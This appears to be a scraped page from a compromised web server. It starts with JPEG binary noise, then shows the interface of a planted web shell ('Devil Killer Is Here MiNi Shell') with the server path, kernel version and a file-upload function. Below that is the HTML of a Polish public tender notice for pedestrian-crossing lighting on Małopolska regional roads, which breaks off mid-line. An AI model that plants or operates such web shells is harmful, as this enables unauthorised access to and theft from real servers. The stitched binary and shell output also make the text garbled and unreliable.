JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240613/0036600101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Poprawa bezpieczeństwa na przejściach dla pieszych w ciągu dróg wojewódzkich Województwa Małopolskiego – z podziałem na części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Wojewódzkich w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000588890</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Głowackiego 56</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-085</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">i.gesiarz@zdw.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdw.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarzadzanie drogami wojewódzkimi </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Poprawa bezpieczeństwa na przejściach dla pieszych w ciągu dróg wojewódzkich Województwa Małopolskiego – z podziałem na części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-df10eb70-225f-11ef-87ba-8eb060fd7bb8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00366001</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00071123/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.21 Poprawa bezpieczeństwa na przejściach dla pieszych w ciągu dróg wojewódzkich</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-df10eb70-225f-11ef-87ba-8eb060fd7bb8 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Składanie ofert (wraz z załączonymi do niej dokumentami, w tym m.in. oświadczeniem, o którym mowa w art. 125 ust. 1 ustawy PZP) – w ramach modułu składania ofert systemu e-Zamówienia. Komunikacja w pozostałym zakresie - za pośrednictwem poczty e-mail (adres: postepowanie46.24@zdw.krakow.pl).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W niniejszym postępowaniu wszelka komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu następujących środków komunikacji elektronicznej (drogą elektroniczną): a) systemu e-Zamówienia (moduł składania ofert), b) poczty elektronicznej (adres e-mail: postepowanie46.24@zdw.krakow.pl). Szczegółowe informacje na temat trybu komunikacji pomiędzy Zamawiającym a Wykonawcami zawarte są w cz. IV SWZ. Zamawiający wymaga, aby dokumenty składane w postępowaniu przez Wykonawców były opatrywane wymaganym podpisem elektronicznym (kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym) - zgodnie z informacjami określonymi w SWZ. Nie dopuszcza się złożenia oferty (formularza ofertowego, formularza kosztorysu ofertowego) w postaci scanów / zdjęć dokumentów papierowych (sporządzonych w formie pisemnej – podpisanych własnoręcznie) – bez względu na ewentualne opatrzenie ich dodatkowo podpisem elektronicznym. Przekazanie scanu dokumentu papierowego (nawet opatrzonego podpisem elektronicznym) nie będzie uznawane za skuteczne złożenie oferty – taka oferta podlegać będzie odrzuceniu jako niespełniająca wymagań wynikających z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z klauzulą informacyjną zawartą w cz. VI SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z klauzulą informacyjną zawartą w cz. VI SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDW-DN-4-271-46/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie pn. Poprawa bezpieczeństwa na przejściach dla pieszych w ciągu dróg wojewódzkich Województwa Małopolskiego – z podziałem na części:<br/>Część nr 1 – budowa doświetlenia przejść dla pieszych: RDW Nowy Sącz, RDW Myślenice.<br/>Zamówienie obejmuje wykonanie doświetlenia przejść dla pieszych usytuowanych w ciągu dróg wojewódzkich zlokalizowanych na terenie Rejonu Dróg Wojewódzkich w Nowym Sączu i Rejonu Dróg Wojewódzkich w Myślenicach – w podziale na zakres podstawowy zamówienia i zakres opcjonalny zamówienia.<br/>1) Zakres podstawowy zamówienia: Przedmiotem zamówienia jest wykonanie robót budowlanych obejmujących w szczególności: - realizację robót ziemnych wraz z wykonaniem przewiertów pod drogami, - wykonanie kanalizacji kablowej z użyciem rur osłonowych i odtworzeniem terenu, - montaż konstrukcji wsporczych (fundamenty, wysięgniki, słupy oświetleniowe), - montaż opraw asymetrycznych, czujników obecności pieszego, czujnika zmierzchowego lub zegara astronomicznego z czujnikiem zmierzchowym, - montaż okablowania (kabel WLZ, instalacja zasilająca i sterująca), - opracowanie dokumentacji technicznej branżowej i powykonawczej, - przygotowanie map do celów projektowych z naniesieniem przebiegu nowych tras kablowych i uzgodnień branżowych, - uzgodnienie projektów stałej organizacji ruchu, uruchomienie doświetlenia w terenie, w następujących lokalizacjach (34 punkty): • była DK 28 km 132+758 Chełmiec, • DW 965 odc. 140 km 0+043 Nowy Wiśnicz, • DW 957 odc. 180 km 0+393 Ludźmierz, • DW 946 odc. 080 km 0+485 Sucha Beskidzka, • DW 957 odc. 040 km 0+831 Zawoja, • DW 960 odc. 010 km 1+831 Bukowina Tatrzańska, • DW 981 odc. 070 km 1+658 Biała Niżna, • DW 981 odc. 080 km 2+584 Grybów, • DW 981 odc. 150 km 3+756 Krynica Zdrój, • DW 969 odc. 120 km 0+454 m. Łącko, • DW 966 odc. 060 km 0+025 Łazany, • DW 975 odc. 270 km 0+160 Podole Górowa, • DW 966 odc. 120 km 0+450 Łapanów, • DW 967 odc. 050 km 2+810 Borzęta, • DW 957 odc. 190 km 0+872 Nowy Targ, • DW 956 odc. 070 km 1+820 Sułkowice, • DW 964 odc. 280 km 0+585 Sułków, • DW 965 odc. 210 km 0+500 Żegocina, • DW 964 odc. 130 km 0+650 Dobczyce, • DW 966 odc. 230 km 0+195 Lipnica Dolna, • DW 966 odc. 100 km 1+850 Zagórzany, • DW 957 odc. 010 km 1+125 Białka, • DW 964 odc. 410 km 0+286 Wola Batorska, • DW 946 odc. 020 km 2+916 Kuków, • DW 953 odc. 070 km 1+070 Zebrzydowice, • DW 961 odc. 015 km 4+600 Poronin Stasikówka, • DW 957 odc. 180 km 0+019 Ludźmierz, • DW 981 odc. 080 km 2+700 Grybów, • DW 969 odc. 130 km 1+026 Jazowsko, • DW 981 odc. 100 km 3+378 Kąclowa, • DW 964 odc. 180 km 2+285 Pawlikowice, • DW 967 odc. 040 km 1+430 Borzęta, • DW 964 odc. 100 km 0+050 Dobczyce, • DW 960 odc. 020 km 0+205 Bukowina Tatrzańska. Niniejsze stanowi zakres podstawowy zamówienia.<br/>2) Zakres opcjonalny zamówienia: Obok wskazanego w ppkt 1 zakresu podstawowego zamówienia Zamawiający przewiduje równocześnie w ramach zastrzeganego prawa opcji dodatkowo wykonanie robót budowlanych obejmujących w szczególności: - realizację robót ziemnych wraz z wykonaniem przewiertów pod drogami, - wykonanie kanalizacji kablowej z użyciem rur osłonowych i odtworzeniem terenu, - montaż konstrukcji wsporczych (fundamenty, wysięgniki, słupy oświetleniowe), - montaż opraw asymetrycznych, czujników obecności pieszego, czujnika zmierzchowego lub zegara astronomicznego z czujnikiem zmierzchowym, - montaż okablowania (kabel WLZ, instalacja zasilająca i sterująca), - opracowanie dokumentacji technicznej branżowej i powykonawczej, - przygotowania map do celów projektowych z naniesieniem przebiegu nowych tras kablowych i uzgodnień branżowych, - uzgodnienie projektów stałej organizacji ruchu, - uruchomienie doświetlenia w terenie, w następujących lokalizacjach (9 punktów): • DW 967 odc. 090 km 3+370 Kunice, • DW 966 odc. 110 km 1+615 Łapanów, • DW 965 odc. 190 km 1+000 Łąkta Górna, • DW 957 odc. 170 km 0+233 Ludźmierz, • DW 964 odc. 180 km 0+625 Raciborsko, • DW 981 odc. 070 km 0+162 Stróże, • DW 966 odc. 015 km 1+545 Lednica Górna, • DW 966 odc. 015 km 1+247 Lednica Górna, • DW 964 odc. 190 km 1+580 Rożnowa. Niniejsze stanowi zakres opcjonalny zamówienia.<br/>Szczegółowe określenie przedmiotu zamówienia zawiera Opis przedmiotu zamówienia (OPZ) stanowiący zał. nr 1 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34996000-5 - Drogowe urządzenia kontrolne, bezpieczeństwa lub sygnalizacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje w ramach zastrzeganego prawa opcji wykonanie robót budowlanych obejmujących w szczególności: - realizację robót ziemnych wraz z wykonaniem przewiertów pod drogami, - wykonanie kanalizacji kablowej z użyciem rur osłonowych i odtworzeniem terenu, - montaż konstrukcji wsporczych (fundamenty, wysięgniki, słupy oświetleniowe), - montaż opraw asymetrycznych, czujników obecności pieszego, czujnika zmierzchowego lub zegara astronomicznego z czujnikiem zmierzchowym, - montaż okablowania (kabel WLZ, instalacja zasilająca i sterująca), - opracowanie dokumentacji technicznej branżowej i powykonawczej, - przygotowania map do celów projektowych z naniesieniem przebiegu nowych tras kablowych i uzgodnień branżowych, - uzgodnienie projektów stałej organizacji ruchu, - uruchomienie doświetlenia w terenie, w następujących lokalizacjach (9 punktów): • DW 967 odc. 090 km 3+370 Kunice, • DW 966 odc. 110 km 1+615 Łapanów, • DW 965 odc. 190 km 1+000 Łąkta Górna, • DW 957 odc. 170 km 0+233 Ludźmierz, • DW 964 odc. 180 km 0+625 Raciborsko, • DW 981 odc. 070 km 0+162 Stróże, • DW 966 odc. 015 km 1+545 Lednica Górna, • DW 966 odc. 015 km 1+247 Lednica Górna, • DW 964 odc. 190 km 1+580 Rożnowa.<br/>Zastrzega się, iż prawo opcji (zakres opcjonalny zamówienia) nie stanowi zobowiązania umownego (w tym finansowego) Zamawiającego zaciąganego w momencie zawarcia umowy w sprawie zamówienia, a przewidywany zakres opcjonalny zamówienia nie jest gwarantowany do realizacji. Powyżej określony zakres objęty prawem opcji (zakres opcjonalny zamówienia) przewidziany zostaje na okoliczność istnienia stosownych możliwości finansowych po stronie Zamawiającego w kontekście realizacji tego zakresu prac oraz uznania potrzeby ich wykonania. Zamawiający podejmie decyzję co do możliwości i woli skorzystania z zastrzeżonego prawa opcji zgodnie z zapotrzebowaniem i posiadanymi możliwościami finansowymi. Wskazany wyżej zakres opcjonalny stanowi maksymalny zakres zastrzeganego prawa opcji. Prawo opcji może być realizowane przez Zamawiającego etapowo / częściowo / fragmentarycznie w okresie realizacji zamówienia – na warunkach określonych w umowie (zał. nr 9.1. SWZ – wzór umowy (dla Części nr 1)). Wykonawca jest zobowiązany do realizacji prac (robót) w ramach zastrzeżonego prawa opcji w przypadku i w zakresie, w jakim korzysta z niego Zamawiający zgodnie z treścią złożonego oświadczenia Zamawiającego o skorzystaniu z prawa opcji i warunkami określonymi w SWZ (umowie) – w momencie złożenia takiego oświadczenia następuje zaciągnięcie przez Zamawiającego zobowiązania finansowego w wysokości wynikającej z zakresu prac (robót) objętego realizowaną na mocy danego oświadczenia opcją. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie następujące kryteria oceny ofert: cena – 60 % oraz okres gwarancji i rękojmi – 40 %.<br/>W kryterium cena ocenie podlegać będzie zaoferowana łączna cena ofertowa (stanowiąca sumę ceny za zakres podstawowy zamówienia oraz ceny za zakres opcjonalny zamówienia).<br/>W kryterium okres gwarancji i rękojmi ocenie podlegać będzie długość okresu gwarancji jakości i rękojmi za wady zaoferowana przez Wykonawcę na wykonany przedmiot umowy – w stosunku do długości przedziału określającego dopuszczalne limity okresu gwarancji i rękojmi określone przez Zamawiającego, tj. minimalny okres gwarancji i rękojmi, który może zaoferować Wykonawca, wynosi 36 miesięcy licząc od daty odbioru końcowego przedmiotu umowy, natomiast maksymalny okres gwarancji i rękojmi, który może zaoferować Wykonawca, wynosi 60 miesięcy licząc od daty odbioru końcowego przedmiotu umowy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamówienie pn. Poprawa bezpieczeństwa na przejściach dla pieszych w ciągu dróg wojewódzkich Województwa Małopolskiego – z podziałem na części:<br/>Część nr 2 – budowa doświetlenia przejść dla pieszych: RDW Tarnów, RDW Kraków, RDW Jakubowice.<br/>Zamówienie obejmuje wykonanie doświetlenia przejść dla pieszych usytuowanych w ciągu dróg wojewódzkich zlokalizowanych na terenie Rejonu Dróg Wojewódzkich w Tarnowie, Rejonu Dróg Wojewódzkich w Krakowie z/s w Zabierzowie i Rejonu Dróg Wojewódzkich w Jakubowicach – w podziale na zakres podstawowy zamówienia i zakres opcjonalny zamówienia.<br/>1) Zakres podstawowy zamówienia: Przedmiotem zamówienia jest wykonanie robót budowlanych obejmujących w szczególności: - realizację robót ziemnych wraz z wykonaniem przewiertów pod drogami, - wykonanie kanalizacji kablowej z użyciem rur osłonowych i odtworzeniem terenu, - montaż konstrukcji wsporczych (fundamenty, wysięgniki, słupy oświetleniowe), - montaż opraw asymetrycznych, czujników obecności pieszego, czujnika zmierzchowego lub zegara astronomicznego z czujnikiem zmierzchowym, - montaż okablowania (kabel WLZ, instalacja zasilająca i sterująca), - opracowanie dokumentacji technicznej branżowej i powykonawczej, - przygotowanie map do celów projektowych z naniesieniem przebiegu nowych tras kablowych i uzgodnień branżowych, - uzgodnienie projektów stałej organizacji ruchu, uruchomienie doświetlenia w terenie, w następujących lokalizacjach (46 punktów): • DW 965 odc. 060 km 0+233 Bochnia, • DW 794 odc. 067 km 0+090 Wolbrom, • DW 977 odc. 130 km 0+425 Bogoniowice, • DW 776 odc. 050 km 2+263 Luborzyca, • DW 794 odc. 175 km 0+395 Cianowice, • DW 794 odc. 210 km 0+100 Januszowice, • DW 794 odc. 110 km 0+017 Podchybie, • DW 980 odc. 130 km 0+353 Rożnowice, • DW 981 odc. 035 km 1+812 Bobowa, • DW 933 odc. 010 km 2+098 Brzeszcze, • DW 977 odc. 120 km 1+150 Gromnik, • była DK 7 odc. 610+673 Książ Wielki, • DW 791 odc. 170 km 1+100 Niesułowice, • DW 933 odc. 050 km 0+498 Rajsko, • DW 980 odc. 100 km 0+320 Rzepiennik Biskupi, • DW 772 odc. 638+690 Słomniki, • DW 975 odc. 150 km 0+010 Bogumiłowice, • DW 781 odc. 230 km 0+821 Sułkowice, • DW 780 odc. 310 km 0+200 Chełmek, • DW 781 odc. 011 km 0+700 Chrzanów, • DW 780 odc. 230 km 0+765 Żarki, • DW 783 odc. 370 km 4+067 Racławice, • DW 977 odc. 030 km 3+291 Zabłędza, • DW 949 odc. 080 km 7+105 Polanka Wielka, • DW 780 odc. 110 km 0+700 Brodła, • DW 993 odc. 020 km 0+559 Dominikowice, • DW 948 odc. 090 km 0+080 Kęty, • DW 776 odc. 060 km 2+830 Biórków Mały, • była DK 7 odc. 621+218 Strzeżów Drugi, • DW 776 odc. 101 km 1+200 Proszowice, • DW 794 odc. 150 km 1+467 Wielmoża, • DW 964 odc. 500 km 0+126 Uście Solne, • DW 979 odc. 020 km 1+200 Gorlice, • DW 791 odc. 070 km 0+782 Klucze, • DW 773 odc. 130 km 0+120 Iwanowice Dworskie, • DW 982 odc. 040 km 3+576 Borki, • DW 965 odc. 090 km 0+077 Bochnia, • DW 776 odc. 025 km 0+615 Prusy, • DW 794 odc. 067 km 0+385 Wolbrom, • DW 794 odc. 220 km 0+197 Zielonki, • DW 794 odc. 120 km 0+383 Trzyciąż, • DW 981 odc. 035 km 2+250 Bobowa, • DW 781 odc. 060 km 0+000 Płaza, • DW 780 odc. 270 km 0+138 Libiąż, • DW 933 odc. 050 km 0+401 Rajsko, • DW 980 odc. 060 km 4+930 Siemiechów. Niniejsze stanowi zakres podstawowy zamówienia.<br/>2) Zakres opcjonalny zamówienia: Obok wskazanego w ppkt 1 zakresu podstawowego zamówienia Zamawiający przewiduje równocześnie w ramach zastrzeganego prawa opcji dodatkowo wykonanie robót budowlanych obejmujących w szczególności: - realizację robót ziemnych wraz z wykonaniem przewiertów pod drogami, - wykonanie kanalizacji kablowej z użyciem rur osłonowych i odtworzeniem terenu, - montaż konstrukcji wsporczych (fundamenty, wysięgniki, słupy oświetleniowe), - montaż opraw asymetrycznych, czujników obecności pieszego, czujnika zmierzchowego lub zegara astronomicznego z czujnikiem zmierzchowym, - montaż okablowania (kabel WLZ, instalacja zasilająca i sterująca), - opracowanie dokumentacji technicznej branżowej i powykonawczej, - przygotowania map do celów projektowych z naniesieniem przebiegu nowych tras kablowych i uzgodnień branżowych, - uzgodnienie projektów stałej organizacji ruchu, - uruchomienie doświetlenia w terenie, w następujących lokalizacjach (8 punktów): • DW 780 odc. 320 km 0+677 Chełmek, • DW 776 odc. 080 km 3+168 Siedliska, • była DK 7 odc. 611+070 Książ Wielki, • DW 776 odc. 110 km 0+800 Opatkowice, • DW 776 odc. 040 km 0+014 Kocmyrzów, • DW 794 odc. 220 km 0+822 Zielonki, • DW 980 odc. 060 km 4+120 Siemiechów, • DW 775 odc. 055 km 0+700 Proszowice. Niniejsze stanowi zakres opcjonalny zamówienia.<br/>Szczegółowe określenie przedmiotu zamówienia zawiera Opis przedmiotu zamówienia (OPZ) stanowiący zał. nr 1 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34996000-5 - Drogowe urządzenia kontrolne, 